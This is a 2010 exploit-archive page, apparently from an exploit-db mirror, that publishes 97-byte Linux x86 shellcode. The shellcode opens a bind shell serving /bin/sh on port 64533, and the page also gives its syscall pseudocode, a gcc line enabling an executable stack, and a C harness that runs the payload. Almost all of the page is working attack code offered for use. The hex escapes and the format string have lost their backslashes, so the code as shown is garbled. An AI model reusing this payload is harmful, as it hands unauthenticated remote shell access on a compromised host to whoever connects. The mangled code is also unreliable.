97 bytes Linx x86 bind shell port 64533

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 97 bytes Linx x86 bind shell port 64533
# Published : 2010-07-05
# Author :
# Previous Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Next Title : Linux x86 netcat connect back port 8080 - 76 bytes

#include <stdio.h>
#include <string.h>

/*
1     ###############################################################  1
0     I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team  1
1     ###############################################################  0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


	by Magnefikko
	05.07.2010
	magnefikko@gmail.com
	Promhyl Studies :: http://promhyl.tk
	Subgroup: #PRekambr
	Name: 97 bytes bind sh@64533
	Platform: Linux x86
	
	sock = socket(PF_INET, SOCK_STREAM, 0);
	bind(sock, *[2, 64533, 0], 16);
	listen(sock, 5);
	nsock = accept(sock, 0, 0);
	dup2(nsock, 0);
	dup2(nsock, 1);
	execve("/bin/sh", 0, 0); // http://promhyl.tk/index.php?a=art&art=83

	gcc -Wl,-z,execstack filename.c

	shellcode:

x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80

*/


int main(){
	char shell[] =
"x6ax66x6ax01x5bx58x99x52x6ax01x6ax02x89xe1xcdx80x89xc6x6ax66x58x43x52x66x68xfcx15x66x53x89xe1x6ax10x51x56x89xe1xcdx80x6ax66x58x43x43x6ax05x56xcdx80x6ax66x58x43x52x52x56x89xe1xcdx80x89xc3x6ax3fx58x31xc9xcdx80x6ax3fx58x41xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x50xb0x0bx59xcdx80";
	printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.tknnstrlen(shell)
= %dn", strlen(shell));
	(*(void (*)()) shell)();
}